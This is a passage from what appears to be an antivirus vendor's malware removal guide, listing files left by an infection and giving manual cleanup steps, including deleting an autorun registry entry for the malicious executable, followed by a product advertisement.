    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771 (1688 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\glmghotels_com[1].htm (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NBPVUVIV.txt (74 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A34B45DD28A5DAEFDA3E0BA2FCE7DE24_21C23C94E1347473379C1C62E36AE785 (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\itgsolutions_nl[1].htm (232 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dbcomponents_com[2].htm (6484 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TM7MY6UT.txt (118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\m[1].htm (718 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\44005FCFFDFBCF74691B1070F563009E (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\B9AEL02I.txt (99 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G3UVMW6F.txt (119 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q64T2BBU.txt (98 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\glmghotels_com[1].htm (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar29CD.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\bigtopmultimedia_net[1].htm (14804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\shipeliteexpress_com[1].htm (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\L27MXZYQ.txt (276 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\shbrazil_com[1].htm (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DOTXE4DT.txt (80 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OXJZ4EUR.txt (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab29CC.tmp (52 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\wp[1].htm (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FVF1A4YM.txt (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7C09F2708B252F662BAF75AB70B0130E (2224 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BGIOWIPG.txt (119 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\racknstackwarehouse_com_au[1].htm (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D (1720 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE8390C335990B3814546A790944878B (2200 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\201FLYKT.txt (127 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6KR62LCW.txt (249 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3457FDAA13DF726057FF405C2970DA8B (1616 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3YMS88UC.txt (116 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab2D2.tmp (51 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AR7D3Y4H.txt (85 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\doctsf_com[1].htm (244 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AT3YCDW8.txt (271 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6E8EC72EA24AED36E3FD7C28C9975F2A (527 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\de-de[2].htm (98 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D2E70F910D3215B7410B46A6E8BBA6B5 (527 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FGK8E349.txt (121 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EAGGR7R9.txt (101 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\de-de[1].htm (98 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\domain_profile[1].htm (28 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AQNNN2UI.txt (95 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KL2KT1W7.txt (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dbcomponents_com[1].htm (12194 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3SEEZ577.txt (800 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F (1512 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar17B0.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YBWDBATR.txt (116 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6VAUSNX4.txt (272 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4 (1480 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S1WYXYWK.txt (72 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\photoclubs_com[1].htm (4930 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\thedonaldsongroup_com[1].htm (1043 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4 (471 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PAJCAVW3.txt (304 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PQIEY0I7.txt (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1BB09BEEC155258835C193A7AA85AA5B_5B6699C51F5CFEEC1143E1241F407692 (1472 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OPQLX3ZZ.txt (118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W64Z6F4O.txt (109 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\suspendedpage[1].htm (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\itgsolutions_nl[1].htm (463 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66A4D23D5A95B47B7FD5EA9A68B334D (2192 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\acicinvestor_ca[1].htm (18325 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\theprintinghouseltd_co_uk[1].htm (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab17AF.tmp (52 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8YRU9P3R.txt (115 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab214.tmp (51 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66A4D23D5A95B47B7FD5EA9A68B334D (527 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\hugedomains_com[1].htm (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab153D.tmp (51 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\theprintinghouseltd_co_uk[1].htm (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220 (727 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar215.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\10191SJR.txt (86 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7C09F2708B252F662BAF75AB70B0130E (527 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9EC3B71635F8BA3FC68DE181A104A0EF_F6C39EF89D8A3A72327D8412589658B2 (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TIDXMUD3.txt (146 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\R0TMR57B.txt (76 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5AOG7S4X.txt (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OU5SWEX8.txt (118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J99Z3K1R.txt (99 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BD5208ADDEC1165FD57AF2BF2F455EAA_7E3FFE794FF28BFE1B1F173FDFF37406 (2032 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HQAIFSP3.txt (93 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1BB09BEEC155258835C193A7AA85AA5B_5B6699C51F5CFEEC1143E1241F407692 (472 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\F7NV82CU.txt (114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2EUSQ9ZW.txt (118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\theprintinghouseltd_co_uk[1].htm (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ACF244F1A10D4DBED0D88EBA0C43A9B5_3FB9EBFC1D18D5E09631A5E5A62F6EF3 (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab180E.tmp (52 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08 (5028 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0SX0GB8W.txt (468 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ACF244F1A10D4DBED0D88EBA0C43A9B5_3FB9EBFC1D18D5E09631A5E5A62F6EF3 (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D27C82366D91771CBE95D6164650B7EB (2216 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\UH2Z9IC8.txt (302 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771 (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8ZHRE7HO.txt (1120 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar2D3.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\perc_ca[1].htm (6346 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\62B37F20965376D7AE7A52389623ED72 (2224 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar2A1D.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\coop_nl[1].htm (228 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A34B45DD28A5DAEFDA3E0BA2FCE7DE24_21C23C94E1347473379C1C62E36AE785 (836 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0255CEC2C51D081EFF40366512890989_791739868612F2F571F41B54D1643609 (1868 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\austriansurfing_at[1].htm (24 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\juizi_com[1].htm (19 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9REMY2UW.txt (114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\taykon_com[1].htm (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\shipeliteexpress_com[1].htm (156 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\21DB7KUK.txt (109 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\espace-hotelier_com[1].htm (5584 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\domain_profile[1].htm (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar180F.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1401C7EC8E96BC79CBFD92F9DF762D_4CE1C8FADD10DC56D6C641AD452A20BD (2604 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F (314 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\naijagurus_com[1].htm (1898 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\itgsolutions_nl[1].htm (463 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7XWZCSWZ.txt (115 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\bigtopmultimedia_net[1].htm (17572 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6E8EC72EA24AED36E3FD7C28C9975F2A (2192 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ompgp_co_jp[1].htm (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220 (1488 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA (728 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\J5CUMQNQ.txt (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C9E3282A673263848AB7F0C007FD3AF1_A8B7EB8E1B4EFC36EE88BC2F4B7529BF (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BFAGMFJV.txt (73 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar153E.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T0VJX29V.txt (92 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\44005FCFFDFBCF74691B1070F563009E (674 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\678B9F95B126F50368710CA85CB2F3DA_AB8D94F29896452B4806732E3EB7F2B7 (3008 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\msasys_com[1].htm (10994 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\wp[1].htm (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8F1BCG21.txt (108 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\378B079587A9184B2E2AB859CB263F40_2B618FC6CF84AEF3C14E129161BF18D9 (2674 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A (2679 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "tebufsufeapa" = "C:\Users\"%CurrentUserName%"\tebufsufeapa.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now